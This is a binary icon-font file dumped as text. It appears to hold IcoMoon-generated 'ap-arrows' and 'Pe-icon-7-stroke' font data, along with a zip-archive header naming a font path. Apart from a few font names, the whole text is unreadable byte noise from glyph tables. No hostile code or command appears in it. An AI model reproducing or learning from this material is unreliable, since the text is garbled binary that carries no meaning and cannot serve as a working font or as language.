 ����� ���������797979����	��3��@�������	'	7�3��@��������		�����U����'	7�U�����)�'	7)C��C�7fE��D���)�	C�7C�E�E�DD\�!'	7!�H!��O����"����"\�!!�!�H���O���%��O���'			7;�;�;;�;;��;�;n<�<�<�=�<;�=;���!!5��>>���!#!!3!� @� �@���!@� �w�!5!��gg���!#!5!3!�3f�3�f��g�4�g�3/���_<�������������������
4Lbv�����*D
�U(c	:
4u		U	(	c		C	
4uap-arrowsVersion 1.0ap-arrowsap-arrowsap-arrowsRegularap-arrowsFont generated by IcoMoon.PK!�*:68�8�flex/fonts/Pe-icon-7-stroke.eotnu&1i�8�p��LP��s> Pe-icon-7-strokeRegularVersion 1.0 Pe-icon-7-stroke�0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
